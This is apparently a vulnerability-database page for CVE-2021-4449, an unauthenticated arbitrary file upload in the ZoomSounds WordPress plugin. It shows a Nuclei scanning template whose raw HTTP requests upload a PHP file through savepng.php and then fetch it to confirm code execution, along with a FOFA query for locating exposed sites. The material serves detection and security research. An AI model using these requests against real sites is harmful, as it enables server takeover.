| Reporter | Title | Published | Views | Family All 11 |
|---|---|---|---|---|
| Ntemplatesbyxit | 7 May 202615:36 | – | githubexploit | |
| CVE-2021-4449 | 16 Oct 202410:30 | – | circl | |
| WordPress plugin ZoomSounds 代码问题漏洞 | 16 Oct 202400:00 | – | cnnvd | |
| CVE-2021-4449 | 16 Oct 202406:43 | – | cve | |
| CVE-2021-4449 ZoomSounds <= 5.96 - Unauthenticated Arbitrary File Upload | 16 Oct 202406:43 | – | cvelist | |
| CVE-2021-4449 | 16 Oct 202407:15 | – | nvd | |
| CVE-2021-4449 | 16 Oct 202407:15 | – | osv | |
| PT-2024-11046 | 15 Oct 202400:00 | – | ptsecurity | |
| CVE-2021-4449 | 6 Feb 202504:21 | – | redhatcve | |
| VulnCheck KEV: CVE-2021-4449 | 7 Nov 202500:00 | – | vulncheck_kev |
id: CVE-2021-4449
info:
name: ZoomSounds Plugin - Unauthenticated Arbitrary File Upload
author: 0xnemian
severity: critical
description: |
ZoomSounds plugin for WordPress contains a file upload vulnerability in savepng.php
impact: |
Unauthenticated attackers can upload arbitrary PHP files via savepng.php without authentication or validation, achieving remote code execution and complete server compromise.
remediation: |
Upgrade to ZoomSounds plugin version that addresses the file upload vulnerability.
reference:
- https://wpscan.com/vulnerability/07259a61-8ba9-4dd0-8d52-cc1df389c0ad
- https://codecanyon.net/item/zoomsounds-wordpress-wave-audio-player-with-playlist/6181433
- https://github.com/0xAgun/Arbitrary-File-Upload-ZoomSounds
- https://ithemes.com/blog/wordpress-vulnerability-report-june-2021-part-5/#ib-toc-anchor-2
- https://www.wordfence.com/threat-intel/vulnerabilities/id/262e3bb3-bc83-4d0b-8056-9f94ec141b8f?source=cve
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2021-4449
cwe-id: CWE-434
epss-score: 0.05288
epss-percentile: 0.91583
cpe: cpe:2.3:a:digitalzoomstudio:zoomsounds:*:*:*:*:*:wordpress:*:*
metadata:
verified: true
fofa-query: body="/wp-content/plugins/dzs-zoomsounds/"
max-request: 3
vendor: digitalzoomstudio
product: zoomsounds
framework: wordpress
tags: cve,cve2021,wpscan,wp,zoomsounds,intrusive,file-upload,vkev
variables:
rand_filename: "{{to_lower(rand_base(8))}}"
string: "CVE-2021-4449"
flow: http(1) && http(2) && http(3)
http:
- raw:
- |
GET /wp-content/plugins/dzs-zoomsounds/savepng.php HTTP/1.1
Host: {{Hostname}}
matchers:
- type: status
status:
- 200
internal: true
- raw:
- |
POST /wp-content/plugins/dzs-zoomsounds/savepng.php?location={{rand_filename}}.php HTTP/1.1
Host: {{Hostname}}
<?php echo md5("{{string}}");?>
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(body, "{{rand_filename}}")'
condition: and
internal: true
- raw:
- |
GET /wp-content/plugins/dzs-zoomsounds/{{rand_filename}}.php HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(body, "{{md5(string)}}")'
condition: and
# digest: 4a0a00473045022100e53ed12d8c2e193aaeb66a2e3fb7e65b0c12e0aefd3750e7fd34b0f90797397902204ee9729bd2bf1d8d6fdfae5badc3ec9d4c314849e988b59167c913ea25ef7e91:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation